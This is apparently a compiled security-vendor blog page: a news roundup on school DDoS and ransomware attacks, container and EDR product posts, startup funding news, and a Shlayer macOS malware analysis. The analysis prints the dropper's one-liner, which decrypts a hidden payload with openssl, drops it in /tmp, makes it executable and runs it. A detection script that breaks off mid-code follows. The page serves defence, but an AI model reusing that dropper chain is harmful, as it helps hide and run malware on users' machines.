The Good, the Bad and the Ugly in Cybersecurity – Week 37

The Good

Schools are trying to get kids back to their desks while also dodging outbreaks of viruses both physical and cyber. Fortunately, at least one roadblock was flattened when a 16-year-old student at South Miami Senior High was charged with launching a DDoS that paralyzed the school district’s computer network for the first three days of virtual classes. Over those three days, all students saw when they tried to log in for the new school year were error messages.

Make that a pummeling of attacks: The Miami-Dade school district said last week that the student admitted to pulling the strings behind eight DDoS attacks targeting the district’s networks, including the web-based systems needed for its online learning platform, called My School Online.

The school system has actually been targeted about two dozen times since the school year began, according to the Miami Herald. Investigators are trying to figure out who else might be behind the attacks besides the student, who admitted to succeeding with an embarrassingly basic attack: He used a decade-old, open-source tool called a Low Orbit Ion Cannon (LOIC) that even the most bare-bones firewall should be able to catch.

The Bad

Zeppelin ransomware has wafted back, again casting its shadow over IT and healthcare providers. This time, it’s picked up an obnoxious passenger: a new Trojan downloader that helps it to sneak around antivirus apps and evade detection.

Analysts at Juniper Threat Labs say that the misery starts with a Microsoft Word document that has a malicious macro hiding in its gut. The rigged email, which aims to lure victims into enabling VBA macros that will trigger infection, includes a blurred “invoice” and text box that are actually just images.

Push the blurry bits aside, and you’ll find random gobbledygook that actually hides snippets of Visual Basic script. The Visual Basic interpreter treats the garbage text as commented-out code and ignores it, leaving just the malicious commands. Strip it down to just those commands and you get to the meat of the matter: a Zeppelin downloader that sleeps for 26 seconds, trying to out-wait dynamic analysis in an automated sandbox, before going on to run the ransomware executable.

As you can see, the ransom note includes its own mini helpdesk manual warning users against trying to rename or decrypt files. The crooks’ argument: You don’t want to add to the cost of your ransom by paying for help that won’t work, now do you? Besides, “you can become the victim of a scam”, the Zeppelin crooks ironically caution their victims. So helpful!

The Ugly

As they struggle to open, schools aren’t just dealing with the COVID-19 pandemic. They’re also dealing with an onslaught of ransomware attacks; DDoS attacks like the one I mentioned above in Miami-Dade, for which police arrested a high school student; and Zoom-bombing: all of it conspiring to delay children’s return to school.

As Threat Post reports, just this week we saw ransomware attacks on the school districts in Hartford, Conn. and Clark County, Nev. On Tuesday, Hartford Public Schools said that a ransomware attack had postponed school openings, both for in-person and online learning. AP reports that yesterday—Thursday, Sept. 10—the Clark County School District in Nevada said that it, too, experienced a ransomware attack during the first week of school and that some employee personal information may have been exposed.

In fact, according to Recorded Future, so far, there have been nine recorded ransomware attacks against school districts in July, August and September. That might sound bad, but it’s been worse: Last year, Recorded Future collected data from hacker forums, threat feeds, news reports and code repositories that showed that at least 15 school districts had been hit by ransomware attacks during a two-week period in September 2019.

Allan Liska, a ransomware specialist at Recorded Future, said that the shift to remote learning might actually cause the trend to point downward. “We are definitely in an uncharted territory,” Liska said. “There has been a small uptick in ransomware attacks as schools get back into session, but with so many school systems going remote this semester there is a much smaller attack surface for the ransomware groups to target.”

Let’s hope he’s right: The kids need a break.


Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.

Read more about Cyber Security

Feature Spotlight: Automated Application Control for Cloud Workloads

One of the principles of cloud-native workloads is that they are built from immutable images containing everything an application needs in order to run. Whereas desktop and laptop users need to install new software, this is not the case for cloud workloads. Based upon the image of the containerized microservice, every process which runs inside a container is fully expected, from the moment the container is spawned until it is killed. Because containerized microservices are dynamic by nature, preserving the immutable state during runtime is crucial for defending against threats such as malware, cryptojacking, and zero-days.

Many solutions today rely upon static allow-lists (formerly, “whitelists”) of all processes that are cleared to run inside the containerized workload, with any deviation from that list considered a threat to be mitigated. There are two different approaches to automatically creating such allow-lists for containerized workloads:

  • Pre-deployment scanning. In this approach, the container image is scanned, creating an allow-list of (expected) processes. While this approach ensures that a container will always run with a predefined set of processes, it adds the overhead of managing allow-lists for new versions of images used in the organization. This overhead creates friction in the gears of agility.
  • Learning during runtime. Here, ML learns the behavior of a container over a period of time, usually in a sandbox, before pushing to production. While this approach provides an auto-generated allow-list, its effectiveness depends on the time period being set. Set it too low and you can miss processes that were not yet triggered, generating a high rate of false positives. Conversely, setting it too high causes long delays when pushing new versions to production.

Having seen organizations struggle to protect their containerized workloads with current solutions, we decided to take a different approach that requires zero intervention by our customers and does not compromise on security.

No More Allow-Lists

We are proud to introduce the Application Control Engine, built to protect cloud-native workloads, providing advanced “lockdown” capabilities that guarantee the immutable state of containerized workloads. It requires no special configurations and does not add complexity or delay to the software delivery chain. This engine protects container workloads from the get-go, whether they run as Kubernetes pods or as plain containers in Docker servers, and can be enabled by one simple click to secure the workloads.

How Does the Application Control Engine Work?

When the Application Control Engine detects a process that impairs the immutable state of a containerized workload, it immediately reports that process as a threat, mitigates it by killing the process, and moves relevant files into quarantine.

Let’s see it in action. Here we have a Node.js application running as a Kubernetes deployment:

Now let’s connect to the pod of this application, download a coin miner binary using wget, provide execute permissions, and run it:

Once executed, the Application Control Engine (1) identifies the execution of the foreign minerd binary as a threat, (2) eliminates it by running a mitigation action that kills the minerd process (exit code 137), and (3) moves the minerd binary to quarantine.

Now, let’s look at the forensics view of the threat:

This view reveals the command line used to initiate the threat (./minerd), the engine used for detection (Application Control) and the mitigation action taken to eliminate the threat (KILLED).

The forensics view also provides complete visibility to container and Kubernetes details including pod name, labels, namespace, and image name:

Now let’s switch to a different view that illustrates the chain of events that led to the execution of the coin miner:

We can clearly see how the kubectl exec command started a bash session inside the node-web-app pod, which was later used to download and execute the minerd binary using wget and chmod commands. The example above shows how Application Control eliminates a coin miner threat started as a binary, but it will, of course, provide the same level of protection for threats based on scripting languages, whether they run as standalone scripts or binaries.
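The immutable-image principle behind the allow-list discussion and the minerd walkthrough, as an added illustration in Python (not SentinelOne’s code; the page does not describe how the engine is implemented): a baseline of file hashes is taken from the image rootfs at build time, and a runtime check flags any executed file that is missing from, or changed relative to, that baseline, including a dropped script run by an in-image interpreter. The rootfs layout, file contents, `cwd`/`argv` plumbing and the `check_exec` interface are constructed assumptions; a real agent would take the executable path from /proc/<pid>/exe.

```python
import hashlib
import os
import posixpath
import tempfile
from dataclasses import dataclass
from pathlib import Path


def _sha256(path: Path) -> str:
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_image_baseline(rootfs: Path) -> dict[str, str]:
    """Pre-deployment scan: map every regular file in the image rootfs
    (container-absolute path) to its sha256. Anything executed at runtime
    that is not in this map, or whose hash differs, departs from the image."""
    baseline: dict[str, str] = {}
    for dirpath, _dirs, files in os.walk(rootfs):
        for name in files:
            p = Path(dirpath) / name
            if p.is_symlink() or not p.is_file():
                continue
            baseline["/" + p.relative_to(rootfs).as_posix()] = _sha256(p)
    return baseline


@dataclass
class Verdict:
    allowed: bool
    reason: str


def check_exec(baseline: dict[str, str], rootfs: Path, exe: str,
               argv: list[str], cwd: str = "/") -> Verdict:
    """Runtime check for one exec event. `exe` is the container-absolute
    executable path (what /proc/<pid>/exe resolves to); a script run through
    an in-image interpreter is caught by checking the script file as well."""
    to_check = [exe]
    # The first argument naming an existing file is treated as the script.
    for arg in argv[1:]:
        abs_path = posixpath.normpath(posixpath.join(cwd, arg))
        if (rootfs / abs_path.lstrip("/")).is_file():
            to_check.append(abs_path)
            break
    for path in to_check:
        on_disk = rootfs / path.lstrip("/")
        if not on_disk.is_file():
            return Verdict(False, f"{path}: running from a deleted file")
        expected = baseline.get(path)
        if expected is None:
            return Verdict(False, f"{path}: foreign file, not in image")
        if expected != _sha256(on_disk):
            return Verdict(False, f"{path}: modified since image build")
    return Verdict(True, "all executed files match the image")


def demo() -> dict[str, Verdict]:
    """Constructed scenario mirroring the walkthrough: an image holding node
    and server.js, then a minerd binary dropped into the running container."""
    with tempfile.TemporaryDirectory() as tmp:
        rootfs = Path(tmp)
        (rootfs / "usr/bin").mkdir(parents=True)
        (rootfs / "app").mkdir()
        (rootfs / "usr/bin/node").write_bytes(b"\x7fELF node stub (constructed)")
        (rootfs / "app/server.js").write_text("require('http')  // constructed\n")
        baseline = build_image_baseline(rootfs)  # taken at image build time

        results = {}
        # 1. Expected workload: bundled interpreter running the bundled script.
        results["node"] = check_exec(baseline, rootfs, "/usr/bin/node",
                                     ["node", "server.js"], cwd="/app")
        # 2. After wget + chmod: a binary that was never part of the image.
        (rootfs / "app/minerd").write_bytes(b"\x7fELF minerd stub (constructed)")
        results["minerd"] = check_exec(baseline, rootfs, "/app/minerd",
                                       ["./minerd"], cwd="/app")
        # 3. Script variant: the in-image interpreter runs a dropped script.
        (rootfs / "app/dropped.js").write_text("// constructed dropped script\n")
        results["script"] = check_exec(baseline, rootfs, "/usr/bin/node",
                                       ["node", "dropped.js"], cwd="/app")
        # 4. An in-image binary patched in place.
        (rootfs / "usr/bin/node").write_bytes(b"patched in place (constructed)")
        results["tampered"] = check_exec(baseline, rootfs, "/usr/bin/node",
                                         ["node", "server.js"], cwd="/app")
        return results


if __name__ == "__main__":
    for name, v in demo().items():
        print(f"{name:9s} allowed={v.allowed!s:5s} {v.reason}")
```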

Conclusion

The Application Control Engine is the answer to the security needs of containerized cloud workloads. It helps secure runtime from known and unknown threats with a simple click of a button, and it does so without any ML training period or unwelcome delays to production release. The Application Control Engine feature is available starting with Linux Agent 4.4 and Kubernetes Agent 4.4, which is in early availability, and requires the Liberty management console (now in GA).



StackRox nabs $26.5M for a platform that secures containers in Kubernetes

Containers have become a ubiquitous cornerstone in how companies manage their data, a trend that has only accelerated in the last eight months with the larger shift to cloud services and more frequent remote working due to the coronavirus pandemic. Alongside that, startups building services to enable containers to be used better are also getting a boost.

StackRox, which develops Kubernetes-native security solutions, says that its business grew by 240% in the first half of this year, and on the back of that, it is announcing today that it has raised $26.5 million to expand its business into international markets and continue investing in its R&D.

The funding, which appears to be a Series C, has an impressive list of backers. It is being led by Menlo Ventures, with Highland Capital Partners, Hewlett-Packard Enterprise, Sequoia Capital and Redpoint Ventures also participating. Sequoia and Redpoint are previous investors, and the company has raised around $60 million to date.

HPE is a strategic backer in this round:

“At HPE, we are working with our customers to help them accelerate their digital transformations,” said Paul Glaser, VP, Hewlett Packard Enterprise, and head of Pathfinder. “Security is a critical priority as they look to modernize their applications with containers. We’re excited to invest in StackRox and see it as a great fit with our new software HPE Ezmeral to help HPE customers secure their Kubernetes environments across their full application life cycle. By directly integrating with Kubernetes, StackRox enables a level of simplicity and unification for DevOps and Security teams to apply the needed controls effectively.”

Kamal Shah, the CEO, said that StackRox is not disclosing its valuation, but he confirmed it has definitely gone up. For some context, according to PitchBook data, the company was valued at $145 million in its last funding round, a Series B in 2018. Its customers today include the likes of Priceline, Brex, Reddit, Zendesk and Splunk, as well as government and other enterprise customers, in a container security market that analysts project will be worth some $2.2 billion by 2024, up from $568 million last year.

StackRox got its start in 2014, when containers were starting to pick up momentum in the market. At the time, its focus was a little more fragmented, not unlike the container market itself — it provided solutions that could be used with Docker containers as well as others. Over time, Shah said that the company chose to hone its focus just on Kubernetes, originally developed by Google and open-sourced, and now essentially the de facto standard in containerisation.

“We made a bet on Kubernetes at a time when there were multiple orchestrators, including Mesosphere, Docker and others,” he said. “Over the last two years Kubernetes has won the war and become the default choice, the Linux of the cloud and the biggest open-source cloud application. We are all Kubernetes all the time because what we see in the market are that a majority of our customers are moving to it. It has over 35,000 contributors to the open-source project alone, it’s not just Red Hat (IBM) and Google.” Research from CNCF estimates that nearly 80% of organizations that it surveyed are running Kubernetes in production.

That is not all good news, however, with the interest underscoring a bigger need for Kubernetes-focused security solutions for enterprises that opt to use it.

Shah says that some of the typical pitfalls in container architecture arise when containers are misconfigured, leading to breaches; as well as around how applications are monitored; how developers use open-source libraries; and how companies implement regulatory compliance. Other security vulnerabilities that have been highlighted by others include the use of insecure container images; how containers interact with each other; the use of containers that have been infected with rogue processes; and containers not being isolated properly from their hosts.

But, Shah noted, “Containers in Kubernetes are inherently more secure if you can deploy correctly.” That is where StackRox’s solutions attempt to help: the company has built a multi-purpose toolkit that provides developers and security engineers with risk visibility, threat detection, compliance tools, segmentation tools and more. “Kubernetes was built for scale and flexibility, but it has lots of controls, so if you misconfigure it, it can lead to breaches. So you need a security solution to make sure you configure it all correctly,” said Shah.

He added that there has been a definite shift over the years from companies considering security solutions as an optional element into one that forms part of the consideration at the very core of the IT budget — another reason why StackRox and competitors like TwistLock (acquired by Palo Alto Networks) and Aqua Security have all seen their businesses really grow.

“We’ve seen the innovation companies are enabling by building applications in containers and Kubernetes. The need to protect those applications, at the scale and pace of DevOps, is crucial to realizing the business benefits of that innovation,” said Venky Ganesan, partner, Menlo Ventures, in a statement. “While lots of companies have focused on securing the container, only StackRox saw the need to focus on Kubernetes as the control plane for security as well as infrastructure. We’re thrilled to help fuel the company’s growth as it dominates this dynamic market.”

“Kubernetes represents one of the most important paradigm shifts in the world of enterprise software in years,” said Corey Mulloy, general partner, Highland Capital Partners, in a statement. “StackRox sits at the forefront of Kubernetes security, and as enterprises continue their shift to the cloud, Kubernetes is the ubiquitous platform that Linux was for the Internet era. In enabling Kubernetes-native security, StackRox has become the security platform of choice for these cloud-native app dev environments.”

Top Ways to Shorten Cybersecurity Remediation Cycles 

A guest post by John Ayers, Chief Strategy Product Officer at Nuspire, on the importance of aligning your business priorities to your endpoint protection platform.

Long remediation cycles are top of mind for many organizations. Decreasing detection time is an improvement; however, it doesn’t translate to shortening remediation cycles once the threat is identified. There continues to be a disconnect between how fast IT teams are detecting threats and how fast they can eradicate them.

As IT teams are tasked to do more with less, the question becomes: How can they optimize existing tools to meet both security and business operation goals?

The answer is aligning priorities to your endpoint protection platform (EPP). Utilizing the right endpoint detection and response (EDR) solution expands visibility into your environment so as to:

  • Further decrease time to detection and remediation
  • Improve your SecOps efficiencies and effectiveness
  • Achieve proactive security that manages the highest-risk cybersecurity threats

Containing a breach in fewer than 30 days could save you millions. Even for a large enterprise, that’s a sizable amount.

Integrated Managed Detection and Response (MDR)

When doing more with less is both the business and operations mandate, how can you achieve economies of scale? With MDR, you only have to see a threat once in your environment, and it’s blocked everywhere. This saves you a tremendous amount of time, shortening your remediation timeline and shrinking costs. EDR integrates with various MDR components on the back end, while its integration with security information and event management (SIEM) provides a user interface (UI) for the front end.

Endpoint isolation enables you to quickly block incoming and outgoing network activity, eliminating the risk of an infection spreading across your network. During isolation, which can be triggered manually or automatically, you can maintain complete visibility into the endpoint through the cloud. Once you mitigate the threat, you can quickly enable the healthy endpoint to rejoin the network.

Why Cutting Remediation Time Is Key to Cutting Costs

Here’s why that fast mitigation matters: the longer your time to remediate, the bigger the hit to your bottom line. Improving mean-time-to-detect key performance indicators (KPIs), which measure cybersecurity effectiveness, is imperative for C-level stakeholders, including both the CISO and business operations. Yet both camps grapple with issues like the cybersecurity talent shortage, a high number of alerts and false positives—according to the CISO Benchmark Report, 41% of organizations get more than 10,000 security alerts daily—along with a lack of insight into what’s happening across their environment. To break this cycle, you don’t need more tools. You need to automate and integrate technologies that give you economies of scale.

EDR allows CISOs to perform in-depth searches of the information that other tools collect across the environment. This enables them to confirm whether that data directly relates to the attack. These insights improve scoping and significantly reduce remediation time.

EDR also enables you to perform advanced search—by schedule or on-demand—for any data across the entire environment, treating each endpoint as a database to be queried. You can quickly execute a query, based on triggers such as detection of indicators of compromise, with the option of increasing automated actions.

Next, let’s take a look at a couple of additional capabilities of EDR that provide actionable insights.

Continuous Monitoring and Scanning

As new threat information becomes available and a file is identified as malicious, EDR automatically quarantines the file and alerts you. Using the file trajectory feature, you can see the file’s lifespan across all endpoints, including malware movement from the initial infected host to other devices. Another feature, device trajectory, shows how hosts interact with files, including an event timeline that traces the threat.

Integrated Threat Intelligence

EDR uses algorithms trained to identify malicious files and activity based on the attributes of known malware. Machine learning capabilities in EDR are fed by the comprehensive artificial intelligence dataset from SentinelOne to ensure a better, more accurate model. This combination helps detect malware at the point of entry, even if a particular variant is brand-new and has never been encountered before.

Machine Learning (ML) with a Little More Magic

EDR automatically receives actionable intelligence from SentinelOne’s Deep File Inspection (DFI) engine, which detects and prevents threats from executing by use of static ML models. Those models are trained to detect threats by looking at various static attributes that can be extracted from executables, making it a signature-less technology that’s superior at detecting file-based threats. Then, SentinelOne’s Dynamic Behavioral Tracking (DBT) tracks all activities on the system, including file/registry changes, service start/stop, inter-process communication and network activity. This information is fed into a dynamic ML model that detects and kills threats that haven’t already been caught by DFI. Since it models the behavior of all processes, the ML model identifies threats that are hard to catch with static models.

Improved Efficiency and Effectiveness

How do you identify which assets are the most exposed so that you can prioritize remediation of the relevant threats? The challenge is to determine which endpoints may have a piece of legacy software with a specific Common Vulnerabilities and Exposures (CVE) entry. Typical endpoint solutions identify which endpoints had outdated apps when they were launched. However, if the software hasn’t run on an endpoint in some time, determining the CVE entry exposure may be delayed or even missed.

To solve that problem, EDR performs advanced search to continuously query all endpoints through a SaaS-based portal. Regardless of when an application with a CVE last ran, if at all, you can run a report that identifies all endpoints and where they reside. If the vulnerability is critical, you can choose to isolate the affected endpoints from the network and mitigate the weakness before attackers can exploit it.

On top of this, EDR has more capabilities that can make your security operations more efficient, such as Automated Workflows and Endpoint Isolation.

Automated Workflows

One example of automated workflows is retrospective analysis, which automatically quarantines a malicious file that originally presented itself as benign. New, unknown threats don’t get blocked when they first enter the environment, but EDR tracks and monitors the file and its behavior. When new threat intelligence indicates the file is malicious, the retrospective feature doesn’t wait for a human to discover it—it quickly blocks the file while triggering an alert so you can review the incident and mitigate it.

Endpoint Isolation

Even with visibility into your environment, removing a threat and remediating a compromised endpoint takes time. This leaves a wider window for a threat to escalate while increasing your remediation time and, consequently, your risk. Endpoint isolation enables you to quickly block incoming and outgoing network activity, eliminating the risk of an infection spreading across your network. During isolation, which can be triggered manually or automatically via APIs, you can maintain complete visibility into the endpoint through the cloud, as well as allow IP address whitelisting. Once you’ve mitigated the threat, you can quickly enable the healthy endpoint to rejoin the network.

Conclusion

EDR enables you to meet both the business and SecOps goals without additional resources. Defending against evolving threats is a complicated responsibility, but you can reduce the complexity and increase efficiency with advanced solutions that are designed to solve today’s complicated security challenges.

Find a provider that has a comprehensive security portfolio that amplifies your IT team’s ability to defend your organization against the riskiest threats. Enable both CISOs and IT teams to do more with less while improving your security posture—and your bottom line.



Snyk bags another $200M at $2.6B valuation 9 months after last raise

When we last reported on Snyk in January, eons ago in COVID time, the company announced $150 million investment on a valuation of over $1 billion. Today, barely nine months later, it announced another $200 million and its valuation has expanded to $2.6 billion.

The company is obviously drawing some serious investor attention, and even a pandemic is not diminishing that interest. Addition led today’s round, bringing the total raised to $450 million with $350 million coming this year alone.

Snyk has a unique approach to security, building it into the development process instead of offloading it to a separate security team. If you want to build a secure product, you need to think about it as you’re developing the product, and that’s what Snyk’s product set is designed to do — check for security as you’re committing your build to your git repository.

With an open-source product at the top of funnel to drive interest in the platform, CEO Peter McKay says the pandemic has only accelerated the appeal of the company. In fact, the startup’s annual recurring revenue (ARR) is growing at a remarkable 275% year over year.

McKay says even with the pandemic his company has been accelerating, adding 100 employees in the last 12 months to take advantage of the increasing revenue. “When others were kind of scaling back we invested and it worked out well because our business never slowed down. In fact, in a lot of the industries it really picked up,” he said.

That’s because as many other founders have pointed out, COVID is speeding up the rate at which many companies are moving to the cloud, and that’s working to Snyk’s favor. “We’ve just capitalized on this accelerated shift to the cloud and modern cloud-native applications,” he said.

The company currently has 375 employees, with plans to add 100 more in the next year. As it grows, McKay says that he is looking to build a diverse and inclusive culture, something he learned about as he moved through his career at VMware and Veeam.

He says one of the keys at Snyk is putting every employee through unconscious bias training to help limit bias in the hiring process, and the executive team has taken a pledge to make the company’s hiring practices more diverse. Still, he recognizes it takes work to achieve these goals, and it’s always easy for an experienced team to go back to the network instead of digging deeper for a more diverse candidate pool.

“I think we’ve put all the pieces in place to get there, but I think like a lot of companies, there’s still a long way to go,” he said. But he recognizes the sooner you embed diversity into the company culture, the better because it’s hard to go back after the fact and do it.

Addition founder Lee Fixel says he sees a company that’s accelerating rapidly and that’s why he was willing to pour in so big an investment. “Snyk’s impressive growth is a signal that the market is ready to embrace a change from traditional security and empower developers to tackle the new security risk that comes with a software-driven digital world,” he said in a statement.

Snyk was founded in 2015. The founders brought McKay on board for some experienced leadership in 2018 to help lead the company through its rapid growth. Prior to the $350 million in new money this year, the company raised $70 million in 2019.

Sprinklr raises $200M on $2.7B valuation four years after last investment

Sprinklr has been busy the last few years acquiring a dozen companies, then rewriting their code base and incorporating them into the company’s customer experience platform. Today, the late-stage startup went back to the fundraising well for the first time in four years, and it was a doozy, raising $200 million on a $2.7 billion valuation.

The money came from private equity firm Hellman & Friedman, which also invested $300 million in buying back secondary shares. Meanwhile the company also announced $150 million in convertible securities from Sixth Street Growth. That’s a lot of action for a company that’s been quiet on the fundraising front for years.

Company founder and CEO Ragy Thomas says he sought the investment now because after building a customer experience platform, he was ready to accelerate and he needed the money to do it. He expects the company to hit $400 million in annual recurring revenue by year’s end and he says that he sees a much bigger opportunity on the horizon.

“We think it’s a $100 billion opportunity and our large public competitors have validated that and continue to do so in the customer experience management space,” he said. Those large competitors include Salesforce and Adobe.

He sees customer experience management as having the kind of growth that CRM has had in the past, and this money gives him more options to grow faster, while working with a big private equity firm.

“So what was appealing in this market for us was not just putting some more money in the bank and being a little more aggressive in growth, innovation, go to market and potential M&A, but what was also appealing is the opportunity to bring someone like a Hellman & Friedman to the table,” Thomas said.

The company has 1,000 clients, some spending millions of dollars a year. They currently have 1,900 employees in 25 offices around the world, and Thomas wants to add another 500 over the next 12 months — and he believes that $1 billion in ARR is a realistic goal for the company.

As he builds the company, Thomas, who is a person of color, has codified diversity and inclusion into the company’s charter, what he calls the “Sprinklr Way.” “For us, diversity and inclusion is not impossible. It is not something that you do to check a box and market yourself. It’s deep in our DNA,” he said.

Tarim Wasim, a partner at investor Hellman & Friedman, sees a company with tremendous potential to lead a growing market. “Sprinklr has a unique opportunity to lead a Customer Experience Management market that’s already massive — and growing — as enterprises continue to realize the urgent need to put CXM at the heart of their digital transformation strategy,” Wasim said in a statement.

Sprinklr was founded in 2009. Before today, it last raised $105 million in 2016 led by Temasek Holdings. Past investors include Battery Ventures, ICONIQ Capital and Intel Capital.

Xometry raises $75M Series E to expand custom manufacturing marketplace

When companies need to find manufacturers to build custom parts, it’s not always an easy process, especially during a pandemic. Xometry, a seven-year-old startup based in Maryland, has built an online marketplace where companies can find manufacturers across the world with excess capacity to build whatever they need. Today, the company announced a $75 million Series E investment to keep expanding the platform.

T. Rowe Price Associates led the investment, with participation from new firms Durable Capital Partners LP and ArrowMark Partners. Previous investors also joined the round, including BMW i Ventures, Greenspring Associates, Dell Technologies Capital, Robert Bosch Venture Capital, Foundry Group, Highland Capital Partners and Almaz Capital. Today’s investment brings the total raised to $193 million, according to the company.

Company CEO and co-founder Randy Altschuler says Xometry fills a need by providing a digital way of putting buyers and manufacturers together with a dash of artificial intelligence to put the right combination together. “We’ve created a marketplace using artificial intelligence to power it, and provide an e-commerce experience for buyers of custom manufacturing and for suppliers to deliver that manufacturing,” Altschuler told TechCrunch.

The kind of custom pieces that are facilitated by this platform include mechanical parts for aerospace, defense, automotive, robotics and medical devices — what Altschuler calls mission-critical parts. Being able to put companies together in this fashion is particularly useful during COVID-19 when certain regions might have been shut down.

“COVID has reinforced the need for distributed manufacturing and our platform enables that by empowering these local manufacturers, and because we’re using technology to do it, as COVID has unfolded […] and as continents have shut down, and even specific states in the United States have shut down, our platform has allowed customers to autocorrect and shift work to other locations,” he explained.

What’s more, companies could take advantage of the platform to manufacture critical personal protective equipment. “One of the beauties of our platform was when COVID hit customers could come to our platform and suddenly access this tremendous amount of manufacturing capacity to produce this much-needed PPE,” he said.

Xometry makes money by facilitating the sale between the buyer and producer. They help set the price and then make money on the difference between the cost to produce and how much the buyer was willing to pay to have it done.

They have relationships with 5,000 manufacturers located throughout the world and 30,000 customers using the platform to build the parts they need. The company currently has around 350 employees, with plans to use the money to add more to keep enhancing the platform.

Altschuler says from a human perspective, he wants his company to have a diverse workforce because he never wants to see people being discriminated against for whatever reason, but he also says as a company with an international market, having a diverse workforce is also critical to his business. “The more diversity that we have within Xometry, the more we’re able to effectively market to those folks, sell to those folks and understand how they utilize technology. We’re just going to better understand our customer set as we [build a more diverse workforce],” he said.

As a Series E-stage company, Altschuler does not shy away from the IPO question. In fact, he recently brought in new CFO Jim Rallo, who has experience taking a company public. “The market that we operate in is so large, and there’s so many opportunities for us to serve both our customers and our suppliers, and we have to be great for both of them. We need capital to do that, and the public markets can be an efficient way to access that capital and to grow our business, and in the end that’s what we want to do,” he said.

Socialbakers acquired by customer engagement company Astute

Astute, a customer engagement platform headquartered in Columbus, Ohio, is announcing that it has acquired social media marketing company Socialbakers.

The financial terms of the acquisition were not disclosed. Socialbakers CEO Yuval Ben-Itzhak will become president of Socialbakers for the combined company, and he told me via email that the entire Socialbakers team will be joining as well, resulting in a combined organization with more than 600 employees and $100 million in annual recurring revenue.

Socialbakers was one of the last independent players from the first wave of social analytics. Founded in 2008 and based in Prague, the company raised a total of $34 million in funding, according to Crunchbase, from investors including Earlybird Venture Capital and Index Ventures. And it’s used by more than 2,500 brands globally.

Astute, meanwhile, has been around for 25 years, and focuses on unifying customer data. Ben-Itzhak said that by acquiring Socialbakers, Astute will be able to add social media-focused features like audience insights, content planning, influencer marketing and ad analytics.

“Socialbakers and Astute are already sharing dozens of mutual brand customers in the enterprise segment,” he said. “This is, in fact, how the acquisition talks came about. The platform integration process has already started and is expected to continue through Q4.”

In a statement, Astute CEO Mark Zablan also emphasized the comprehensiveness of the resulting platform.

“The lines between customer care, customer experience, and marketing have become increasingly blurred, presenting real challenges for companies,” Zablan said. “Combining the market-leading social media marketing capabilities of Socialbakers with Astute’s engagement suite not only helps our customers tackle this challenge more effectively, but also marks a major milestone along Astute’s journey towards becoming the end-to-end customer engagement platform that the Chief Customer Officer needs to succeed.”

B2B marketing company Metadata.io raises $6.5M

Metadata.io announced today that it has raised $6.5 million in Series A funding.

It’s been more than four years since I wrote about the startup’s $2 million seed funding. At the time, co-founder and CEO Gil Allouche described the product as helping business-to-business marketers target their ads as people who resemble their existing sales leads.

Since then, the company has launched its product in general availability, and Allouche told me yesterday that it’s become “really the middleware for the sales and marketing stack.”

“It doesn’t just … give you insights, it skips the human as the bottleneck of execution for marketing [operations],” Allouche said, adding that this makes marketing teams more efficient while also eliminating much of the drudgery. “If you’re a Don Draper who’s really good at creative or content, you should spend your time on that and not in an Excel spreadsheet.”

At the same time, ad targeting remains a key part of the company’s capabilities. For example, its new product MetaMatch allows advertisers to build and target custom audiences on Facebook, LinkedIn and programmatic display.

Allouche also said that demand has increased “quite significantly” since the beginning of the pandemic. That’s counter to larger digital ad trends, but he noted that B2B companies still need to reach customers, and many of the old tools — like in-person events — are now off the table.

[Image: Gil Allouche and the Metadata leadership team]

In addition, he said that Metadata’s proprietary database of 1.4 billion customer profiles has given it an additional advantage in the face of privacy regulation and ad-tracking restrictions.

The platform has been used by companies including Zoom, Drift, Pendo, Udacity, and Vonage.

The new funding was led by Resolute Ventures, with participation from Greycroft, York IE, Stormbreakers, Eloqua founder Mark Organ, Segment founder Ilya Volodarsky and others.

“Metadata isn’t another marketing technology,” Organ said in a statement. “From the origin of the company transforming marketing operations by eliminating tedious manual work, to today, creating a category that transcends demand gen, it is enabling the autonomous marketer to be a reality. It is the marketer that’s needed for the future.”

Coming Out of Your Shell: From Shlayer to ZShlayer

Earlier this year, we discussed how threat actors have been turning to scripting languages as a preferred means of both dropping malware and executing payloads. That trend has continued with some interesting innovations in response to the static detection signatures now widely in use both by Apple and other vendors. A recent variant of the Shlayer malware follows Apple’s lead in preferring Zsh to Bash as its default shell language and employs a novel encoding method to avoid detection. In this post, we describe this variant and show how it can be decoded to reveal the telltale Shlayer signature.

Didn’t We Just Hear About Shlayer?

Shlayer is perhaps the most talked about macOS malware at the moment and hit the news again recently after being caught sneaking past Apple’s macOS Notarization checks. That version of Shlayer was an interesting diversion: using a Mach-O binary written in C++ to execute a Bash shell script in memory. That might well suggest that Apple’s Notarization checks are static rather than dynamic as the telltale Shlayer code is only evident once the packed binary runs:

sh -c "tail -c +1381 "/Volumes/Install/Installer.app/Contents/Resources/main.png" | openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass "pass:0.6effariGgninthgiL0.6" && chmod 777 /tmp/ZQEifWNV2l && /tmp/ZQEifWNV2l "/Volumes/Install/Installer.app/Contents/MacOS/pine" && rm -rf /tmp/ZQEifWNV2l"

The classic Shlayer technique is clearly evident here: passing encrypted and password-protected code to openssl and then writing that out as a payload to the /tmp folder.
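The chain above (carve a blob off the tail of a resource file, decrypt it with openssl using an inline password, drop it under /tmp, chmod it, run it, delete it) is distinctive enough to triage mechanically from a captured process command line. The following Python is an added example, not the post's code or any SentinelOne tooling: it tokenises a command line of that shape, pulls out the offset, carrier file, cipher, digest, password and drop path, flags the tail/openssl/drop/execute pattern, and rebuilds an openssl command an analyst can run to recover the payload to disk for static analysis without executing it. The captured one-liner is the post's, with the outer sh -c wrapper removed so it tokenises cleanly; the benign command lines are constructed.

```python
import os
import re
import shlex

# The post's captured Shlayer one-liner with the outer `sh -c "..."` wrapper removed
# so that it tokenises cleanly; the inner command is otherwise as shown in the post.
SHLAYER_CMD = (
    'tail -c +1381 "/Volumes/Install/Installer.app/Contents/Resources/main.png" | '
    "openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l "
    '-pass "pass:0.6effariGgninthgiL0.6" && chmod 777 /tmp/ZQEifWNV2l && '
    '/tmp/ZQEifWNV2l "/Volumes/Install/Installer.app/Contents/MacOS/pine" && '
    "rm -rf /tmp/ZQEifWNV2l"
)

# Constructed benign lines that share individual tokens with the one above.
BENIGN_CMDS = [
    "openssl enc -aes-256-cbc -pbkdf2 -in backup.tar -out backup.tar.enc -pass pass:hunter2",
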